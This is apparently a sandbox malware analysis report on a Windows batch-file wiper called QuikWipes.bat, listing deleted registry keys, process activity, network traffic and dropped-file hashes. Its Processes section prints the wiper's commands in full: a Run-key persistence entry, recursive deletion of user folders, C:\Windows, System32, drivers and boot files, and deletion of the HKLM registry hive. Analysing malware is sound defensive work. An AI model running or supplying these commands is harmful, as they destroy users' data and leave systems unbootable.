Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{C8F209F8-480E-454C-94A4-5392D88EBA0F} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{D4A97620-8E8F-11CF-93CD-00AA00C08FDF} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extension Compatibility\{22BF413B-C6D2-4D91-82A9-A0F997BA588C} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\Restriction Policies\Hashes\AC343CECCF835E2FEF435465263770412B7573B4 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{01002B17-5D93-4551-81E4-831FEF780A53} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{0006f02a-0000-0000-c000-000000000046} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Extension Compatibility\{8DCB7100-DF86-4384-8842-8FA844297B3F} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{d99f7670-7f1a-11ce-be57-00aa0051fe20} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\UnattendBackup\DisableDataExecutionPrevention C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{025B1052-CB0B-11CF-A071-00A0C9A06E05} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{510a4910-7f1c-11ce-be57-00aa0051fe20} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{AED98630-0251-4E83-917D-43A23D66D507} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\AdvancedOptions\JAVA_VM\CONSOLE C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\RunDLl32Policy\cnmsm53.dll C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{CC7E636D-39AA-49b6-B511-65413DA137A1} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{5740A302-EF0B-45CE-BF3B-4470A14A8980} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{A80D199B-CFDD-4DA4-8C47-2310D5B8DD97} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{18ab439e-fcf4-40d4-90da-f79baa3b0655} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\ULINKS\ALWAYS C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{00020420-0000-0000-c000-000000000046} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{FF2BBC4A-6881-4294-BE0C-17535B1FCCFA} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extension Compatibility\{179E4A98-A3C4-407D-8C66-E63B67BB6F4A} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extension Compatibility\{DA986D7D-CCAF-47B2-84FE-BFA1549BEBF9} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{3050F4F5-98B5-11CF-BB82-00AA00BDCE0B} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{B26E6120-DD35-4BEA-B1E3-E75F546EBF2A} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Extension Compatibility\{472734EA-242A-422B-ADF8-83D1E48CC825} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Extension Compatibility\{5A074B21-F830-49DE-A31B-5BB9D7F6B407} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_WEBOC_MOVESIZECHILD C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{C5702CCD-9B79-11D3-B654-00C04F79498E} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{4faab301-cef6-477c-9f58-f601039e9b78} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\CRYPTO\TLS1.0 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{0006f02a-0000-0000-c000-000000000046} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\NavigatorPluginsList C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{208DD6A3-E12B-4755-9607-2E39EF84CFC5} C:\Windows\system32\reg.exe N/A

Modifies registry class

Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{C888351B-5DFD-3A9F-8D36-96E7770D0EBF}\4.0.0.0 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{F7F63240-3F54-4B38-8E8C-7409E5252ADD}\ProxyStubClsid32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0385-ABCDEFFEDCBC}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\OfficeTheme\CLSID C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{092A1E21-9379-4B9B-AD31-D5FEE2F748C6}\ProxyStubClsid32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0065-ABCDEFFEDCBC}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Extensions\windows.fileTypeAssociation\.adt C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\VBEFile\ShellEx C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{000C031F-0000-0000-C000-000000000046}\TypeLib C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00000051-0000-0010-8000-00AA006D2EA4}\TypeLib C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{A921AF37-36D9-30D1-9ABB-FE255AAA60AE} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\JavaPlugin.114012\CLSID C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{87D5F036-FAC3-4390-A1E8-DFA8A62C09E7}\1.0\0\win32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{7B076AD1-BD51-11D2-9238-00A02448799A}\ProxyStubClsid32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\acrobat\shell\open\ddeexec C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3050F2D3-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{61D328E9-E23E-3D50-9618-6CE4D3BFFFB5} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{B49EF72B-EE56-3A93-ACA1-0C9508CDBEDB} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{550D0110-8DCD-11D1-8524-00A02495E426}\VersionIndependentProgID C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{CBC361D2-B7A6-4FEB-A237-35CC98300A4A}\ProxyStubClsid32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0009-ABCDEFFEDCBC}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0298-ABCDEFFEDCBC} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{31AC3F11-E5EA-4A85-8A3D-8E095A39C27B}\NumMethods C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{796A2C2D-5B11-4FB5-9077-56D5E674972B}\ProxyStubClsid32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{000209F4-0000-0000-C000-000000000046}\LocalServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0216-ABCDEFFEDCBB} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0376-ABCDEFFEDCBA} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00020832-0000-0000-C000-000000000046}\DataFormats\DefaultFile C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00024707-0000-0000-C000-000000000046} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9FDBF962-061C-44E8-ACFE-779A37343F90}\ProxyStubClsid32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00020833-0000-0000-C000-000000000046}\Conversion\Readable C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{D7053240-CE69-11CD-A777-00DD01143C57}\ProgID C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{02B17CB4-7D55-4B34-B38B-10381433441F} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0293-ABCDEFFEDCBC}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{000C037D-0000-0000-C000-000000000046} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\.rtf\ShellNew C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0187-ABCDEFFEDCBB} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0353-ABCDEFFEDCBB}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{9DC6AC40-EDFA-3E34-9AD1-B7A0A9E3A40A} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A020FAD9-D661-4857-AA43-E6A86FF1163E} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0023-ABCDEFFEDCBB}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0084-ABCDEFFEDCBA} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\VLC.rmi\shell\Open C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{000C036F-0000-0000-C000-000000000046}\TypeLib C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\.prc C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\.wri\PersistentHandler C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Media Type\Extensions\.m3u C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000208E8-0000-0000-C000-000000000046}\ProxyStubClsid32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6DFFE7FE-3153-4AF1-95D8-F8FCCA97E56B}\ProxyStubClsid32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0246-ABCDEFFEDCBA}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00024490-0000-0000-C000-000000000046}\ProxyStubClsid32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0042-ABCDEFFEDCBC} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0026-ABCDEFFEDCBC}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FD1A378C-F117-4F43-917C-DADCA1308606} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{00D1ACA9-41F2-3340-816E-330175414A56} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\.avif\Shell\setdesktopwallpaper C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\.flac\ShellEx\{BB2E617C-0920-11D1-9A0B-00C04FC2D6C1} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\7-Zip.tgz\shell\open C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{54AFDECB-0EC4-397D-96AB-8E2A64FD7C3A} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\VisShe.ImageExtractorShellExt C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{7372DCE0-F816-4E35-8B42-64B7F50E6395}\ProxyStubClsid32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0010-ABCDEFFEDCBB}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{26170123-45FD-30F7-987D-BF3689662B6C} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0069-ABCDEFFEDCBC} C:\Windows\system32\reg.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1284 wrote to memory of 3500 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1284 wrote to memory of 3500 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1284 wrote to memory of 2124 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1284 wrote to memory of 2124 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1284 wrote to memory of 552 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1284 wrote to memory of 552 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1284 wrote to memory of 4824 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1284 wrote to memory of 4824 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1284 wrote to memory of 3304 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1284 wrote to memory of 3304 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1284 wrote to memory of 4816 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1284 wrote to memory of 4816 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1284 wrote to memory of 4420 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1284 wrote to memory of 4420 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1284 wrote to memory of 1500 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1284 wrote to memory of 1500 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1284 wrote to memory of 216 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1284 wrote to memory of 216 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1284 wrote to memory of 4920 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1284 wrote to memory of 4920 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1284 wrote to memory of 2008 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1284 wrote to memory of 2008 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1284 wrote to memory of 4592 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1284 wrote to memory of 4592 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1284 wrote to memory of 4052 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1284 wrote to memory of 4052 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1284 wrote to memory of 212 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1284 wrote to memory of 212 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1284 wrote to memory of 4112 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1284 wrote to memory of 4112 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1284 wrote to memory of 2516 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1284 wrote to memory of 2516 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1284 wrote to memory of 2360 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1284 wrote to memory of 2360 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1284 wrote to memory of 4484 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1284 wrote to memory of 4484 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1284 wrote to memory of 5072 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1284 wrote to memory of 5072 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1284 wrote to memory of 1072 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1284 wrote to memory of 1072 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1284 wrote to memory of 4624 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1284 wrote to memory of 4624 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1284 wrote to memory of 5008 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1284 wrote to memory of 5008 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\QuikWipes.bat"

C:\Windows\system32\reg.exe

reg add "hklm\Software\Microsoft\Windows\CurrentVersion\Run" /v "rundll32_awspeGfa_w32" /t "REG_SZ" /d C:\Users\Admin\AppData\Local\Temp\QuikWipes.bat /f

C:\Windows\system32\cmd.exe

cmd.exe /k del /q /f /s C:\Users\Admin\Desktop\*

C:\Windows\system32\cmd.exe

cmd.exe /k del /q /f /s C:\Users\Admin\Pictures\*

C:\Windows\system32\cmd.exe

cmd.exe /k del /q /f /s C:\Users\Admin\Documents\*

C:\Windows\system32\cmd.exe

cmd.exe /k del /q /f /s C:\Users\Admin\Music\*

C:\Windows\system32\cmd.exe

cmd.exe /k del /q /f /s C:\Users\Admin\Downloads\*

C:\Windows\system32\cmd.exe

cmd.exe /k for /R C:\Users\Admin\AppData\Roaming\ %a in (*) do @echo oops you clicked a sus link and now your files are goooone

C:\Windows\system32\cmd.exe

cmd.exe /k RMDIR C:\Windows

C:\Windows\system32\taskkill.exe

TASKKILL /F /IM EXPLORER.EXE

C:\Windows\system32\reg.exe

reg add "hklm\Software\Microsoft\Windows\CurrentVersion\Run" /v "rundll32_awspeGfa_w32" /t "REG_SZ" /d C:\Users\Admin\AppData\Local\Temp\QuikWipes.bat /f

C:\Windows\system32\cmd.exe

cmd.exe /k RMDIR C:\Windows

C:\Windows\system32\cmd.exe

cmd.exe /k ren C:\Windows\System32\LogonUI.exe Youareanidiot.exe.pwned

C:\Windows\system32\cmd.exe

cmd.exe /k del /q /f /s C:\Users\Admin\AppData\Roaming\*

C:\Windows\system32\cmd.exe

cmd.exe /k ren C:\Windows\SysWOW64\* *.minishark

C:\Windows\system32\cmd.exe

cmd.exe /k del /q /f /s C:\Windows\*

C:\Windows\system32\cmd.exe

cmd.exe /k del /q /f /s C:\Windows\System32\*

C:\Windows\system32\cmd.exe

cmd.exe /k del /q /f /s C:\Users\Admin\AppData\Roaming\*

C:\Windows\system32\cmd.exe

cmd.exe /k del /q /f /s C:\WindowsBoot\*

C:\Windows\system32\cmd.exe

cmd.exe /k del /q /f /s C:\Windows\System32\winload.exe

C:\Windows\system32\cmd.exe

cmd.exe /k del /q /f /s C:\Windows\System32\BCD\*

C:\Windows\system32\cmd.exe

cmd.exe /k RMDIR C:\Windows\System32\BCD

C:\Windows\system32\reg.exe

REG DELETE HKLM /f

C:\Windows\system32\cmd.exe

cmd.exe /k del /q /f /s C:\Windows\System32\Drivers\*

C:\Windows\system32\cmd.exe

cmd.exe /k del /q /f /s C:\Windows\*

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 18.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp

Files

C:\Users\Admin\Desktop\HACKER2231615224111619878113162804320770537333862714041803272119027573.txt

MD5 a911b36535d43a8a9cd54b028ee92236
SHA1 74a5c2013b757dee646e9a2b480a1447fd96d1b3
SHA256 387bda4105dea0edb3d41b38538b9a302a029843d03dfee54724c78c0c241701
SHA512 61b767d5912eb1c3f677c0abf477d828328a39c55e5bee9c4e7336e5a5445020a6b8abfa706f4d8048da9927c0ad77fba4d748d1077bcedd6e3f49b8290e96e3

C:\Users\Admin\AppData\Local\Temp\22265427411787636826741326151834811518.FUCKYOULMAO

MD5 9644e3ba2ce9ddbf0d46353cae08a3d9
SHA1 95dc5c2c66f09a13b9a5c2a9d4f38cab5192febb
SHA256 7f02b3edbe11bef870bea79fda021ecfd6db8b1b307b51f1eae649d5549b60b0
SHA512 1ab5354c16fdc02b0ebc312d4e7e28579861b3172cdc2964c4e49796b1816dfe6c90b8bb4c82a7c506d4c940a6182e11dd446ee22b921285df3c03396e25823a